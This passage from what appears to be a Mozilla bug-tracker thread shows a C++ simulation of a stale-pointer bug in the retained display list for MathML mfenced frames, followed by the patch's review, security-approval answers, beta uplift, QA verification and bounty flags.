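    items.push_back({&f, f.closeChar.get(), f.generation});
    f.needsItemRebuild = false;
  }

  // One paint with retained-display-list semantics. A frame flagged as
  // modified gets its items rebuilt before GetBounds runs; otherwise the
  // items from the previous paint are reused as-is. Returns how many items
  // pointed at a deleted char (0 means the paint was safe).
  std::size_t Paint(MfencedFrame& f, std::vector<Rect>* bounds) {
    if (f.needsItemRebuild) BuildFor(f);
    std::size_t stale = 0;
    bounds->clear();
    for (const auto& item : items) {
      Rect r;
      if (item.GetBounds(&r)) bounds->push_back(r); else ++stale;
    }
    return stale;
  }
};

// The sequence from the testcase: a first paint builds the items (the sync
// XHR spin), the id attribute changes, the next refresh-driver tick paints.
std::size_t RunScenario(bool fixed, std::vector<Rect>* boundsOut) {
  MfencedFrame frame;
  frame.CreateFencesAndSeparators(5);
  RetainedDisplayList list;
  list.BuildFor(frame);                 // first paint
  frame.AttributeChanged(8, fixed);     // o290.id = 'id3'
  return list.Paint(frame, boundsOut);  // next paint
}

int main() {
  std::vector<Rect> b;
  std::size_t unpatched = RunScenario(false, &b);  // 2 stale items
  std::size_t patched = RunScenario(true, &b);     // 0, bounds from new chars
  return (unpatched == 2 && patched == 0) ? 0 : 1;
}
```

The generation check is what makes the model safe to run; the real fix does not need it because marking the frame modified guarantees the items are rebuilt before anything reads mChar again, which is also why the sec-approval comment notes that the patch visibly invalidates something on attribute change.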
Comment on attachment 8929213 [details] [diff] [review]
invalidate-mathml-items

Review of attachment 8929213 [details] [diff] [review]:
-----------------------------------------------------------------

LGTM.
Attachment #8929213 - Flags: review?(mikokm) → review+
Comment on attachment 8929213 [details] [diff] [review]
invalidate-mathml-items

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Somewhat easily, it's clear that we're invalidating something on an attribute change.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
The current commit message does, but I can strip that for landing.

Which older supported branches are affected by this flaw?
Only mozilla-central has retained-dl, and only for the last few days of Nightly.

How likely is this patch to cause regressions; how much testing does it need?
Very unlikely, shouldn't need extra testing.
Attachment #8929213 - Flags: sec-approval?
If this is Nightly only, then it doesn't need sec-approval.
Attachment #8929213 - Flags: sec-approval?
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Comment on attachment 8929213 [details] [diff] [review]
invalidate-mathml-items

Approval Request Comment
[Feature/Bug causing the regression]: bug 1352499. This is code that is preffed off, but we want to run a shield study enabling the pref.
[User impact if declined]: None, preffed off code.
[Is this code covered by automated tests?]: Yes, when the pref is enabled.
[Has the fix been verified in Nightly?]: Yes
[Needs manual test from QE? If yes, steps to reproduce]: No
[List of other uplifts needed for the feature/fix]: None
[Is the change risky?]: No
[Why is the change risky/not risky?]: Code is preffed off.
[String changes made/needed]: None
Attachment #8929213 - Flags: approval-mozilla-beta?
Comment on attachment 8929213 [details] [diff] [review]
invalidate-mathml-items

Fix a sec-high, taking it.
Attachment #8929213 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Group: layout-core-security → core-security-release
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
I managed to reproduce this issue on Firefox 59.0a1(2017-11-14) asan build, under Ubuntu 16.04x64. The issue is no longer reproducible on Firefox 58.0, or on Firefox 59.0a1(2018-01-17). Tests were performed under Ubuntu 16.04x64, Windows 10x64 and under macOS 10.12.6.
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Flags: sec-bounty?
Group: core-security-release
Flags: sec-bounty? → sec-bounty+
Keywords: regression